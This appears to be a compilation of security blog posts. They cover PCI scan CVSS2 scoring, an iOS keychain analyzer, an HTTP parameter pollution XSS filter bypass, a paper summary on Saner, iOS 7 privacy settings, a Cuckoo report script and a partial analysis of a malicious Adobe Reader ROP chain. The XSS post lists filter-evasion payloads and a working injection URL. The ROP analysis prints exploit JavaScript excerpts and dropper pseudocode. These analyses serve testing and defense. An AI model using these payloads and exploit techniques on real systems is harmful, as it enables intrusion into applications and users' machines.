In the next few sections let’s analyze few scenarios I have come across when conducting the PCI ASV scans.

Case 1 - Self-Signed Certificate

Let’s calculate the CVSS2 score for a vulnerability where scanner has flagged an application using Self-Signed Certificate as medium risk issue, Following are the valid CVSS2 parameter to be used and reflect the score for it and based on which risk will be calculated and PCI compliance status will be analyzed.

Exploitability Metrics

MetricValueJustification
Access VectorAdjacent NetworkThe system can be accessed from any remote network by any system
Access ComplexityMediumRequires little skill or additional information gathering
AuthenticationNoneNo authentication is required to exploit this flaw or get access to the authentication environment

Impact Metrics

MetricValueJustification
Confidentiality ImpactPartialThere is considerable informational disclosure but attacker has no control
Integrity ImpactPartialUser can alter the traffic or once exploited
Availability ImpactNoneNo impact to the availability of the system



Risk will be rated as Medium and this vulnerability will result in PCI Compliance status as FAIL

Case 2 - Special Case Self-Signed Certificate

Now let’s assume if there is slight change in the environment of the above same vulnerability and following information was provided by the PCI Scan client. The Affected system has restricted access and not available publicly, access is controlled using IPS/IDS and user IPs is whitelisted. Following will be the change in input parameter while calculating the CVSS2 score under above specified condition.

Exploitability Metrics

MetricValueJustification
Access VectorAdjacent NetworkRequires local network access - which accounts for the white-listed IP address
Access ComplexityHighSpecialized access conditions exist
AuthenticationNoneNo authentication is required to exploit this flaw or get access to the authentication environment

Impact Metrics

MetricValueJustification
Confidentiality ImpactPartialThere is considerable informational disclosure but attacker has no control
Integrity ImpactPartialUser can alter the traffic or once exploited
Availability ImpactNoneNo impact to the availability of the system



Risk will be rated as Low and this vulnerability will result in PCI Compliance status as PASS. So a slight change in the environment and accessibility has changed the risk for the issue.

Case 3 - Multiple Server Vulnerabilities

Let’s calculate the CVSS2 score for a vulnerability where scanner has flagged a server affected by multiple vulnerabilities which is a High risk issue, Following are the valid CVSS2 parameter to be used and reflect the score for it and based on which risk will be calculated and PCI compliance status will be analyzed.

Exploitability Metrics

MetricValueJustification
Access VectorNetworkThe system can be accessed from any remote network
Access ComplexityMediumRequires little skill and information gathering
AuthenticationNoneNo authentication is required to exploit this flaw or get access to the authentication environment

Impact Metrics

MetricValueJustification
Confidentiality ImpactPartialThere is considerable informational disclosure but the attacker has no control
Integrity ImpactPartialUser can alter the traffic or once exploited
Availability ImpactPartialReduced performance or interruptions in resource availability



Risk will be rated as High and this vulnerability will result in PCI Compliance status as FAIL

Case 4 - Special Case Multiple Server Vulnerabilities

Now let’s assume if there is slight change in the environment of the above same vulnerability and following information was provided by the PCI Scan client. The Affected system has restricted access and not available publicly, access is controlled using IPS/IDS and user IPs is whitelisted. We'll change the following while calculating the CVSS2 score under above specified condition.

Exploitability Metrics

MetricValueJustification
Access VectorNetworkRequires network access - which accounts for the white-listed IP address
Access ComplexityHighSpecialized access conditions exist
AuthenticationNoneAuthentication may not be required.

Impact Metrics

MetricValueJustification
Confidentiality ImpactPartialThere is considerable informational disclosure but attacker has no control
Integrity ImpactPartialModification of some system files or information is possible
Availability ImpactPartialReduced performance or interruptions in resource availability



Risk will be rated as a Medium based on the new CVSS2 score but this vulnerability will still result in PCI Compliant status as FAIL.

Case 5 - Multiple Server Vulnerabilities in Unused Functionality

Now let’s assume if there is more information about the above same vulnerability provided to us by the client saying:

The affected server modules on which the vulnerabilities have been reported are not being used by the application or the server and the system is not publicly accessible

This is a special case where client confirms that affected server module are not being used, this indicates that the vulnerability cannot be exploited since the modules have not been used, so the vulnerability risk can be moved to low from medium with below specified note with default CVSS2 score.

Note: This issue is moved to low since the affected vulnerable modules of the server are not being used and it is advised that reported un-used module should be removed from the server as incase if they are implemented or used in future and result in high risk vulnerability.

Risk can now be rated as Low based on the note and information provided by client and this vulnerability will result in PCI Compliant status as PASS.

Additional Tips and Suggestions

  1. Most of the vulnerability scanning tools provide CVSS2 score with vulnerabilities. Sometimes these scores may be wrong, so it’s best to review and validate them before finalizing the risk.
  2. The CVSS2 score, if not present for vulnerability, should be calculated manually using the CVSS2 calculator and appropriate risk should be finalized.
  3. The right parameters should be used while calculating the risk, wrong parameters may result in wrong score and wrong compliance status.
  4. To reduce the risk if the vendor has a compensatory control for vulnerability, a new CVSS2 score should be calculated considering the compensatory control.
  5. As per PCI ASV, DoS vulnerabilities will be rated as per below rule:

    In case of denial-of-service vulnerabilities, where the vulnerability has both a CVSS2 Confidentiality Impact=none and a CVSS2 Integrity Impact=none, the vulnerability must be marked as pass and must be rated as low risk.


Hope this helps!

Analyzing Keychain Contents with iOSKeychain Analyzer

$
0
0
By Neelay Shah.

iOS exposes a secure storage "Keychain" which can be used by applications to securely store critical and security sensitive data such as symmetric keys, asymmetric private keys, certificates, username, passwords etc. As part of penetration testing iOS applications it is often necessary to be able to inspect the contents of this keychain to identify what the application is storing in the keychain and how it is potentially using the same. A common example is to use "Keychain" to store the login username and password so that the user is logged in seamlessly when the application is launched. The iOS simulator simulates this "Keychain" as a SQLite database. However, this SQLite database is encrypted and as such opening it does not help much.

iOSKeychain Analyzer extracts and exports the contents of the keychain (on the iOS simulator) along with the associated attributes/properties. The types of keychain items range from passwords, certificates to keys. The attributes for these keychain items include details such as clear text values, accessibility details, description/comments, creation/modification etc. Additionally, the tool also analyzes the iOS simulator keychain contents from a security standpoint.

Download

You can find the Binary here:

and the Source code here:

Installation / Pre-Requisites

The source code should compile successfully on Mac OS X 10.7.4/Xcode 4.4.1/iOS SDK 5.0. Once compiled, you can run it on an iOS 5.0/5.1 simulator. Though not tested, the code should compile and run fine on a more recent platform/environment than this.

A compiled binary is provided for the iPhone 5.1 Simulator. To use this binary as is - copy the "01EFB1DB-4A47-45A1-B692-F88996FAC4F8" to "/Users//Library/Application Support/iPhone Simulator/5.1/Applications". Then launch iOS Simulator. Set the device to iPhone and version 5.1 and the application should appear installed on the simulator. You can then launch from there.

The data export/report files should open fine in Safari 6.0+, Firefox 17.0+ and Chrome 23.0.1271.101+

Usage

First install and configure the application that you are testing within the iOS simulator. If iOS Keychain Analyzer is not installed within the simulator then install it. See the "Installation / Pre-Requisites" section for instructions on how to install the tool.

Next Launch the iOS Keychain Analyzer, you'll be presented with the following page:



First export the data:



Then analyze it:



It'll create the Library/Caches/DataAndAnalysisReports (e.g. /Users/[Username]/Library/Application Support/iPhone Simulator/5.1/Applications/01EFB1DB-4A47-45A1-B692-F88996FAC4F8/Library/Caches/DataAndAnalysisReports/) folder to store the results.

Within the folder are two reports:

  1. iOSKeychainDataViewer.htm - This report displays the entire contents of the keychain in a readable format. The raw keychain contents are stored in JSONP format in the "KeychainDataExport.jsonp" file
  2. iOSKeychainAnalysisReportViewer.htm - This report displays the keychain data analysis report in a readable format. The raw analysis report can be found in the "KeychainAnalysisReport.jsonp"


Analyzing Keychain Contents

iOSKeychain Analyzer runs the following checks:

  1. Weak Password Check - All password items that have a length less than 8 characters, or is not alphanumeric or does not contain a special character is flagged
  2. Weak Authentication Method Check - All password items that are configured to be used with weak authentication methods such as HTTP Basic and HTTP Digest are flagged
  3. Weak Protocol Check - All passwords that are configured to use insecure protocols such as HTTP, FTP etc. are flagged
  4. Weak Key Length Check - All symmetric keys with key length less than 128 bits and all asymmetric keys with key length less than 1024 bits are flagged
  5. Insecure Accessibility Check - All items that can be accessed insecurely (irrespective of whether the device is locked or not) are flagged


Known Issues

The tool does not export the clear text public key or private key. The reason being the API exposes the opaque public/private key structure but not the actual bytes.


Bypassing XSS Mitigations with HTTP Parameter Pollution

$
0
0
By Piyush Mittal.

HTTP Parameter Pollution is overriding or adding HTTP GET/POST parameters by injecting query string delimeters. Basically, the attacker sends the same parameter multiple times to affect the application. This can also be exploited by specifying a new random parameter and adding it to the request. The server may combine the values of the duplicate parameter or reject one of the two values. The following table summarizes the known behaviors in different web servers:


from Luca Carettoni's and Stefano di Paolo's presentation at OWASP EU09

Vulnerable Request

I was recently looking at an application that appeared to be vulnerabile to cross-site scripting since it was possible to inject <, >, ",;, etc.... , but something (web application firewall/blacklisting) would strip HTML tags and attributes. From here on out, we'll refer to anything that might be doing filtering as "mitigations". The vulnerability was in the "category" parameter sent within a POST request to "search.htm":


POST /search.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

category=



Whenever any sort of HTML tag would be provided to the category parameter, the application would redirect the user to a error page that referenced OWASP:


HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 Sep 2013 02:12:58 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA/Tomcat-5.5
Content-Length: 0
Location: https://www.somesite.com/error.html?code=OWASP
Connection: keep-alive
Content-Type: text/html; charset=UTF-8




POST to GET

It's suprising how many mitigations can be bypassed right out of the box by simply changing the request from a POST to a GET (or vice versa). Unfortunately, for this exercise, changing the request did not work. However, the application supported it, which made exploitation easier.

Traditional Bypass

First I tried to the standard filter evasion techniques by trying different parameters, etc.. Here's a list that were all blocked:

  • "onclick
  • "ondblclick
  • "onmousedown
  • "onmousemove
  • "onmouseover
  • "onmouseout
  • "onmouseup
  • "onkeydown
  • "onkeypress
  • "onkeyup
  • "onabort
  • "onerror
  • "onload
  • "onresize
  • "onscroll
  • "onunload
  • "onsubmit
  • "onblur
  • "onchange
  • "onfocus
  • "onreset
  • "onselect
  • “><ScRiPt>
  • “><SCRIPT>
  • “><script//
  • “><script/**/
  • “><script+
  • “><script%20
  • “><script
  • “><%73%63%72%69%70%74>
  • “><<script>>
  • “><s/**/c/**/r/**/i/**/p/**/t>
  • “><s//c//r//i//p//t>
  • “><s+c+r+i+p+t>
  • “><s%20c%20r%20i%20p%20t>
  • “><%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74>
  • <object
  • <div
  • <img
  • <a

HPP as a Bypass

As you may have guessed, by simply specifying the category parameter twice, it was possible to completely bypass the mitigation. The second instance of the parameter was ignored by the mitigation, then at the server both parameters were combined, allowing the script injection!

Here's the final URL:


search.htm?category=&category=”><script>alert(‘reflected%20xss’)</script>



Validating Custom Sanitization in Web Applications with Saner

$
0
0
By Gursev Singh Kalra.

I recently read a paper in which the authors combined static and dynamic source code review techniques to evaluate the effectiveness of custom build data sanitization routines in PHP based web applications. The paper was very interesting and I thought to summarize it for quick consumption.

The authors suggest that static analysis systems are not able to analyze custom sanitization routines and often report security vulnerabilities even when custom routines are able to effectively neutralize malicious characters. The reported vulnerabilities are then subjected to manual analysis which is error prone and often results in inaccurate results with false positives or negatives.

As a part of their research, the authors wrote Saner with the objective to analyze custom sanitization routines to identify XSS and SQL injection vulnerabilities in web applications. Saner works by combining Static and Dynamic analysis techniques which resulted in low false positive rates and it had the ability to identify the exact attack vectors that could bypass the custom sanitization code. It is based on Pixy; an open source web vulnerability scanner for PHP.

Let us look at the two phases employed by Saner.



Static Analysis

There are two types of static analysis models, sound and unsound. The sound model flags custom sanitization routines as ineffective and the unsound model assumes that string manipulation operations on tainted input results in untainted output. The sound model can result in large number of false positives and the unsound model may lead to false negatives.

Pixy provides the data flow analysis between sources and sensitive sinks, identifies if any built in sanitization routines are applied to the identified data flow paths. Pixy follows sound analysis model and it flags custom sanitization routines as ineffective and that results in high false positive rates. Additionally, program variables in Pixy can be either tainted or untainted and Pixy cannot capture the set of values each variable can hold.

To address these shortcomings, Pixy was extended to derive an over-approximation of the values that program variables can hold for every point in the program. It was based on finite state automata to describe an arbitrary set of strings and associating taint qualifiers to the automata transitions. This provided Saner with an ability to track the taint status of different parts of the string.

Saner performs postorder traversal on Pixy’s dependency graphs to derive the automata that describe the possible string values a program node can contain. The node can be a) a string, b) a variable or c) an operation. When a node represents a string literal, it is decorated with an automaton that describes the exact string. The automaton for program variables is calculated based on the successor nodes from the dependency graph.

Saner categorizes operations in two types of groups. The first group has the functions that are precisely modeled, i.e. Saner is uses finite state transducers to compute an automaton to describer all possible output strings from this category of functions. The Saner team developed a number of finite state transducers for custom string manipulation functions and also the functions that are commonly used for input sanitization. This is required to precisely capture the effect of the sanitization routines. The second group is of un-modeled functions where Saner depends on the values passed to the parameters of these functions and computes the automaton based on least upper bound of the taint status of the supplied parameters.

Saner uses Mohri and Sporat’s algorithm to model the functions. The automata used in the Mohri and Sporat’s algorithm are not taint aware. In order to get around the limitation, the algorithm was left unmodified and a clever workaround was used to leverage the existing algorithm to propagate taint information. The workaround replaced static strings with empty ones to ensure that static, untainted strings that contain dangerous meta-characters do not lead to false positives. To compensate for the loss of information from static string removal, an over approximation of possible string values was derived based on various modeled functions and the parameters they accept. This approach allowed removal of false negatives.

Finally, in order to determine if a potentially malicious input makes it to a sensitive sink, an intersection is calculated between the automaton that represents the sink’s input and the automaton that contains the set of undesired characters. For every non-empty intersection, the source-sink pair is flagged as a potential true positive and the information is passed to the dynamic analysis phase.

The following image summarizes the static analysis phase:



Dynamic Analysis

The static phase is conservative and may generate false positives and that requires developers to manually inspect the code to weed out the reported false positives. The dynamic analysis component attempts to automate this analysis by directly executing the custom sanitization routines on a set of malicious inputs and then analyzing the output to determine if the malicious characters were sanitized or not.

After receiving the source-sink pairs from the static analysis component, the dynamic analysis extracts all the nodes pertinent to the custom data sanitization and abstracts out all the other application details. It then calculates sanitization graph for each source-sink pair and uses that information to construct all possible paths from source to sink.

Based on the type of the sink, a test suite (XSS or SQL injection) is selected for evaluation. For example, if the sink forms a portion of a SQL query, SQL injection test suite will be run on the corresponding data flow paths. The final step of the process invokes the PHP interpreter to evaluate the result of executing each block of code using the corresponding test suite.

The results of each test were then analyzed by an oracle function to check for occurrence of particular substrings and the result was categorized as a true positive or a false positive.

The following image summarizes the dynamic analysis phase:



Results

Saner identified 13 novel vulnerabilities across five open source PHP applications. The time required to perform analysis was in the order of a few minutes for almost all applications.

Observations

  1. Saner’s dynamic analysis effectiveness is primarily driven by its input test suite which is limited. The whitepaper does not discuss the mutation engines, if any, used for the attack vectors. An intelligent mutation engine can potentially make the tool more effective. Additionally, the tool was written to identify XSS vectors that rely on < symbol. Including other XSS injection techniques can also increase the detection rate.
  2. The interesting custom validation bypass attacks that Saner identified and discussed in the paper were Cross Site Scripting attacks and the authors did not discuss any identified SQL injection vulnerability.
  3. The dynamic analysis component can also be leveraged to write unit test cases for PHP web applications. I could not find Saner source code and plan to reach out to the authors to check its availability.


iOS 7 Security Settings and Recommendations

$
0
0
By Kunjan Shah.

Apple finally released the much anticipated iOS 7 last Wednesday, September 18th. A lot of people are rushing in and updating to this latest version. It hit 18% adoption in just 24 hours after its release. I gotta admit, I love the look and feel of it and it feels like a completely new phone in my hand. In this blog post I have tried to explain some of the new and modified security settings, features that you should be aware of before you move to iOS 7.

Recent Hacks

iOS 7 Lock Screen Bypass Flaw

Just one day after its release, iOS 7 lock bypass flaw was identified by a user as show in this video. I tried it out on my iPhone 5 running iOS 7 and it is a fairly simple trick. This was followed by a similar flaw that was identified in the beta version of iOS7 sometime back. May be a good reason to not jump to iOS 7 right away? Until an official fix is released by Apple you can disable access to the Control Center from locked screen as discussed below.

Yet another bug allows an attacker the ability to bypass the lock screen and make calls.

Siri Abuse to Post Facebook Updates

Siri gains more power in iOS 7, maybe too much power. This vulnerability identified that while certain Siri commands are restricted (disallowing the user to post to facebook) there are alternate commands that accomplish the same task but are unrestricted.

Apple TouchID Bypass and Drama

Latest iPhone models include a fingerprint reader called the TouchID. The intention behind this addition was in the right place, but as shown by the CCC, fingerprints should not be used as a security identifier. Hacking the TouchID got tons of attention from security community due to a crowd funding venture, however it appears that a fraudster named Arturas Rosenbacher took much of the credit for the venture, made false promises, and never paid up, creating a little drama in the industry.

Notification Center

Notification center which was first introduced with iOS 5 gets a facelift with iOS 7. One of the key security distinction this time around is that you can access the notification center now from a locked screen. Notification center is a hub of information ranging from calendar, reminders, stocks, missed calls, messages etc. Unless you have a very good reason to keep it accessible from the locked screen I recommend disabling it. To disable it navigate to Settings > Notification Center. Toggle “Notification View” and “Today View” to off as shown below.



Control Center

With iOS 7 Apple has introduced Control Center, which lets you access frequently accessed settings by swiping up from the bottom of the screen. This feature, similar to the Notification Center, is accessible from the locked screen by default. It lets you modify settings such as Wi-Fi, Bluetooth, Airplane Mode, Airdrop etc. Again, it is recommended that you disable this feature from the locked screen. As shown in this video, having control center accessible from the locked device can let anyone in possession of your iPhone bypass the lock screen completely. This is another very good reason to disable access to it from the locked screen.

You can disable it from under Settings > Control Center. Toggle “Access on Lock Screen” to off as shown in the figure below.



Airdrop

With OS X Lion Apple introduced a new peer-to-peer file sharing feature called Airdrop for the Mac users. This feature is now also made available to the iOS 7 users using iPhone 5 models. This feature lets you transfer maps, pictures, videos using Wi-Fi and Bluetooth to other users in close proximity. One of the settings for Airdrop is that it lets you choose whether your iPhone can be discoverable by everyone or just your contacts. It is recommended that you select “Contacts Only” as it is a safer alternative than “Everyone”, unless you want to receive file sharing requests from anonymous people around you.



Powerful New Siri

iOS 7 introduces a powerful version of Siri with additional commands that lets you change settings on the fly from locked screen such as “Enable Bluetooth”, “Turn on Airplane Mode”. You can also find recent tweets, post on Facebook, read and reply to new messages, view missed calls, and listen to voice messages etc. from the locked screen using Siri.



It is recommended that you disable access to Siri from a locked screen. To do so, go to Settings > General > Passcode Lock and disable Siri and other settings as shown in the figure below.



Activation Lock

This is one of the nicest security feature that Apple has introduced with iOS 7. In an attempt to prevent thieves from reselling stolen iPhones by just resetting them and swapping the SIM card; Apple introduced this feature called “Activation Lock” to augment its Find My iPhone service. This feature prevents someone to erase all the data and re-activate the device, or turn find my iPhone off without entering the Apple id and the password first. When you first upgrade to iOS 7 Apple asks for your Apple id to enable this feature. To enable it at a later stage simply go to Settings > iCloud > Toggle Find my iPhone setting to on. To read more about this topic, visit this post.



Privacy Controls in iOS 7

Microphone (New Feature)

iOS 7 now asks for user’s permission if an application intends to access the microphone. In the previous versions of iOS permissions were limited to contacts, calendars, photos etc. This is a new and nice privacy control. You can see which apps have been authorized to access the microphone and revoke access by going to Settings > Privacy > Microphone.



Private Browsing Button (Re-designed)

The “Private” browsing setting has been moved out from the “Settings” and now more easily available within Safari. You can easily enable “Private” browsing by navigating to bookmarks in Safari and tapping on the “Private” button on the bottom left corner. Moreover, you can also disable all tracking by going to Settings > Safari and turning “Do Not Track” button to off.



Limit Ad Tracking (Re-designed)

This feature lets you limit ad tracking and reset your device’s “Advertising Identifier”. This prevents companies from sending you targeted advertisements through a unique tracking number tied to your device. To enable this option go to Settings > Privacy > Limit Ad Tracking and turn it on as shown below.



Frequent Locations

When you first upgrade to iOS 7 it asks you if you want to remember places that you frequently visit. If you opt-in, frequent locations setting saves this information and transmits it anonymously to Apple to improve Maps. There is no surprise here that iPhone keeps track of places you frequently visit, if you followed the Location-gate fiasco that unveiled in 2011, when a database of Wi-Fi hotspots was discovered on the iOS 4 devices. However, now apple is being more transparent about it and provides an option for users to opt-in. Good thing is this is turned off by default in iOS 7. It is no longer a developer-only setting, but a consumer feature according to Apple. If you opt-in by mistake and want to opt out then go to Settings > Privacy > Location Services > Scroll down to System Services at the bottom of the screen > Toggle Frequent Locations to off.

In addition to this, I recommend turning off the “Diagnostics & Usage” and “Location-Based iAds” settings as well. Diagnostics & Usage setting monitors what you do on your device and anonymously sends it to Apple for improving iOS. iAds caused a lot of noise in 2010 when Apple published its long privacy policy. Bottom line is if you don’t care about targeted ads you should probably disable this.



Blocking Contacts (New Feature)

With iOS 7 now you have the ability to block contacts for phone calls, iMessages and FaceTime. To block someone go to Settings > Messages or FaceTime and scroll down to “Blocked”. From here you will be able to add contacts that you want blocked as shown below.



References

  1. http://www.macworld.com/article/2048738/get-to-know-ios-7-changes-in-the-settings-app.html
  2. http://blogs.wsj.com/digits/2013/09/18/how-to-use-apples-new-ios-7-privacy-controls/
  3. http://www.pcmag.com/article2/0,2817,2423635,00.asp
  4. http://www.buzzfeed.com/charliewarzel/this-is-what-it-looks-like-when-your-phone-tracks-your-every
  5. http://resources.infosecinstitute.com/ios-application-security-part-6-new-security-features-in-ios-7/
  6. http://www.idownloadblog.com/2013/08/08/a-closer-look-at-frequent-locations-in-ios-7/


Getting a Grip on Your Cuckoo Reports

$
0
0
By Melissa Augustine.

I recently had a forensics case where I had to test a lot of files for malicious behavior. “No problem!” I thought, “I can just use my watcher script to automatically push all 50 files to my cuckoo instance... I'll just sit back and watch the CPUs crunch by...”

That was all well and good... until I realized I needed to go through the 50 reports manually to look for suspicious behavior.

Not cool.

I like how on malwr.com (the online instance of Cuckoo) if you have an account you can get a quick summary of all your submissions such as Filename, Antivirus detections, and file type.

And I wondered if I could create such a thing for my personal Cuckoo Sandbox at home... and so the Cuckoo Scraper Script was born!

Cuckoo Scraper Script

Download:Prerequisites:
  • Jinja2 (which if you are generating reports on Cuckoo, you already have!)
Usage:



--path: Where your analyses folder is for Cuckoo, this is generally at /home/$USER/cuckoo/storage/analyses

--template: the Jinja template to be used for the output. I have included in the script a basic template (called template.html)

--output: Where you want the created HTML file to be saved to

Example



This will generate a HTML file based on the analyses you have in the given path, pulling from the JSON report certain attributes:

  • Filename
  • Yara Hits (if any)
  • Virus Total Response Code
  • Virus Total Verbose Response
  • Number of Positive Hits from VT (if any)
  • URL to VirusTotal report (if there are hits)
  • Link to the Cuckoo HTML Report


Sample Output



The script iterates through all the folders in the path you give as a parameter and then for each of those folders, looks for the report.json file. If it can’t find the report files (i.e. cuckoo couldn’t generate a report for whatever reason), the script lets you know and moves on.

From there, the script parses the JSON and stores the desired fields as variables. These are then passed to Jinja, which renders them using the template provided with the ‘-t’ argument. The result is the pretty (OK not so pretty) output seen above in the last Figure.

The cool thing is with a little knowledge on Jinja, you can add more fields to the output as your analysis requires.

Analysis of a Malware ROP Chain

$
0
0
By Brad Antoniewicz.

Back in February an Adobe Reader zero-day was found being actively exploited in the wild. You may have seen an analysis of the malware in a number of places. I recently came across a variant of this malware and figured it would be nice to provide a little more information on the ROP chain contained within the exploit.

Background

After Adobe was notified of the exploit their analysis yielded two vulnerabilities: CVE-2013-0640 and CVE-2013-0641. Initially the ambiguity of the vulnerability descriptions within the advisories made it hard to tell if both CVE-2013-0640 and CVE-2013-0641 were being exploited in the variant I came across - but from what I can put together, CVE-2013-0640 was used in the initial exploit for memory address disclosure and code execution. Then the exploit transfers control to another DLL that escapes the Adobe Reader sandbox by exploiting CVE-2013-0641.

Exploit Characteristics

Once I get past the malicious intent, I'm one of those people who can appreciate a nicely written exploit or piece of malware. This variant was particularly interesting to me because it exploited an pretty cool vulnerability and showed signs of sophistication. However, at the same time, there was tons of oddly structured code, duplication, and overall unreliability. It was almost like one person found the crash, one person wrote the ROP chain, and a final person hacked everything together and filled in the gaps. If this was my team, I'd fire that final person :)

In this section we'll cover the general characteristics of the exploit that serve as an important background but are not directly part of the ROP chain.

Javascript Stream

The exploit is written in Javascript embedded into a PDF stream. Extracting the Javascript is pretty straight forward:

 root@kali:~# pdfextract evil.pdf



Obfuscation



The Javascript was similar to how it was described in previous articles: It appeared to be at least partially obfuscated, but had some readable Italian/Spanish word references throughout. For example:

ROP_ADD_ESP_4 = 0x20c709bb;
.
.
.
pOSSEDER[sEGUENDO - 1] += "amor";
pOSSEDER[sEGUENDO - 5] += "fe";
pOSSEDER[sEGUENDO - 10] += "esperanza";




Most everything in this article is the result of my manual deobfuscation of the JavaScript (lots of find and replace).

A similar Javascript exploit was found posted on a Chinese security forum. I can't say how or if the two are connected, its possible the Chinese site just put friendly names to the obfuscated functions. It just struct me odd that the post named functions and variables so precisely with little structural change from the obfuscated version.

Version Support

The exploit first checks the result of app['viewerVersion'] to determine the Reader version. The following versions appear to be supported within the exploit:
  • 10.0.1.434
  • 10.1.0.534
  • 10.1.2.45
  • 10.1.3.23
  • 10.1.4.38
  • 10.1.4.38ARA
  • 10.1.5.33
  • 11.0.0.379
  • 11.0.1.36
  • 9.5.0.270
  • 9.5.2.0
  • 9.5.3.305
The author developed entire ROP chains for each version, this surely took some time to do. I looked at 10.1.2.45, which is the focus of this article.

ASLR



The address leak vulnerability in AcroForm.api facilitated an ASLR bypass by providing the module load address of AcroForm.api. The exploit writers had to first trigger the vulnerability, get the module load address, then adjust the offsets in the ROP chain at runtime before loading it into memory.

Stack Pivot

Once the code execution vulnerability is triggered, the exploit directs Reader to a stack pivot ROP gadget that transfers control from the program stack to the ROP chain that is already loaded into memory on the heap. Oddly the stack pivot address is defined within a variable inside the JavaScript ROP chain build function, rather than being part of the returned ROP Chain string. Instead of simply defining the stack pivot address as an offset, the exploit writer defined it as an absolute address using the default IDA load address.

Later on in the exploit the writer actually subtracts the default load address from this gadget address to get the offset then adds the leaked address. This is a totally different programmatic way from the approach used in this function to calculate a gadget's address which may indicate this exploit was developed by more than one author or maybe a IDA plugin was used to find the stack pivot. Here's the important parts of the JavaScript associated with the stack pivot to illustrate this conclusion:

 function getROP(AcrobatVersion,moduleLoadAddr){
.
.
.
else if(AcrobatVersion == '10.1.2.45'){
var r="";
r+=getUnescape(moduleLoadAddr+0x17);
r+=getUnescape(moduleLoadAddr+0x17);
.
.
.
}
STACK_PIVOT = 0x2089209e ;
return r;
}
var ropString = getROP(AdobeVersionStr['AcrobatVersion'], moduleLoadAddr);
var idaLoadAddr= (0x20801000);

stackPivotOffset = getUnescape(STACK_PIVOT - idaLoadAddr + moduleLoadAddr);



As you can see, there are two methods here, the simple "getUnescape(moduleLoadAddr+0x17);" and the more complex "getUnescape(STACK_PIVOT - idaLoadAddr + moduleLoadAddr);".

Rather than digging through the exploit code, an easy way to identify the stack pivot within WinDBG is to set a breakpoint on one of the first ROP gadgets in the Javascript ROP chain build function: moduleOffset+0x41bc90 -

 0:000> lmf m AcroForm
start end module name
63a80000 64698000 AcroForm C:\Program Files\Adobe\Reader 10.0\Reader\plug_ins\AcroForm.api
0:000> uf 63a80000 + 1000 + 0x41bc90
AcroForm!DllUnregisterServer+0x39dc1a:
63e9cc90 54 push esp
63e9cc91 5e pop esi
63e9cc92 c3 ret
0:000> bp 63a80000 + 1000 + 0x41bc90
0:000> g



When the breakpoint is reached, we can look at where the stack pointer is pointing. Since it's pointing at memory on the heap (and not the stack) we know the stack pivot executed.
 Breakpoint 5 hit
eax=0000f904 ebx=00000001 ecx=63b1209e edx=00000000 esi=165acd6c edi=05c49f18
eip=63e9cc90 esp=118455ac ebp=001ede18 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
AcroForm!DllUnregisterServer+0x39dc1a:
63e9cc90 54 push esp




At this breakpoint we also know the heap block where the ROP chain was loaded (ESP is pointing to it). We can use !heap to find the start of the heap block and inspect it. At offset 0x4 is the stack pivot:

 0:000> !heap -p -a esp
address 118455ac found in
_HEAP @ 1ab0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
1183f8f8 1927 0000 [00] 1183f900 0c930 - (busy)

0:000> dd 1183f900
1183f900 00380038 63b1209e 63a81017 63a81017
1183f910 63a81017 63a81017 63a81017 63a81017
1183f920 63a81017 63a81017 63a81017 63a81017
1183f930 63a81017 63a81017 63a81017 63a81017
1183f940 63a81017 63a81017 63a81017 63a81017
1183f950 63a81017 63a81017 63a81017 63a81017
1183f960 63a81017 63a81017 63a81017 63a81017
1183f970 63a81017 63a81017 63a81017 63a81017

0:000> uf 63b1209e
AcroForm!DllUnregisterServer+0x13028:
63b1209e 50 push eax
63b1209f 5c pop esp
63b120a0 59 pop ecx
63b120a1 0fb7c0 movzx eax,ax
63b120a4 c3 ret



JavaScript DLLs

At the end of every version-dependent ROP chain is:
 0x6f004d
0x750064
0x65006c



Which is the hexadecimal equivalent of the unicode string "Module". Appended to that is a larger block of data. Later on we'll determine that the ROP chain searches the process memory for this specific delimiter("Module") to identify the block which is the start of a base64 encoded DLL that gets loaded as the payload.

ROP Pseudocode

Before we dig into the assembly of the ROP chain, let's look at it from a high level. It uses the Windows API to retrieve a compressed base64 encoded DLL from memory. It decodes it, decompresses it, and loads it. If we were to translate its assembly to a higher level pseudo code, it would look something like this:
 hModule = LoadLibraryA("MSVCR90.DLL");
__wcsstr = GetProcAddress(hModule, "wcsstr");
base64blob = __wcsstr(PtrBlob, "Module");

hModule = LoadLibraryA("Crypt32.dll");
__CryptStringToBinaryA = GetProcAddress(hModule, "CryptStringToBinaryA");
__CryptStringToBinaryA(base64blob, 0, CRYPT_STRING_BASE64, decodedBlob, pcbBinary, pdwSkip, pdwFlags );

hModule = LoadLibraryA("NTDLL.dll");
__RtlDecompressBuffer = GetProcAddress(hModule, "RtlDecompressBuffer");
__RtlDecompressBuffer(COMPRESSION_FORMAT_LZNT1, decompressedBlob, UncompressedBufferSize, decodedBlob, CompressedBufferSize, FinalUncompressedSize);

hModule = LoadLibraryA("MSVCR90.DLL");
__fwrite = GetProcAddress(hModule, "fwrite");

hModule = LoadLibraryA("Kernel32.dll");
__GetTempPathA = GetProcAddress(hModule, "GetTempPathA");

tmpPath = "C:\Users\user\AppData\Local\Temp\";
__GetTempPathA(nBufferLength , tmpPath);

tmpPath += "D.T";

hFile = fopen(tmpPath, "wb");
fwrite(decompressedBlob, size, count, hFile);
fclose(hFile);

LoadLibraryA("C:\Users\user\AppData\Local\Temp\D.T");
Sleep(0x1010101);



Setup

The first thing the ROP Chain does is note where it is in memory. We'll see later on that it does this so it can dynamically modify the arguments passed to the functions it calls rather using static values.

 r+=ue(t+0x41bc90) ; // push esp/pop esi/ret



The r variable is returned to the caller as the ROP chain, the ue() returns an unescape()'ed string from the parameters it was passed and the t variable is the AcroForm.api module load address.

The pseudocode above shows that a number of calls, particularly the ones to LoadLibraryA() and GetProcAddress(), require strings as arguments. The ROP Chain accomplishes this by directly copying the strings into the .data segment of AcroForm.api.



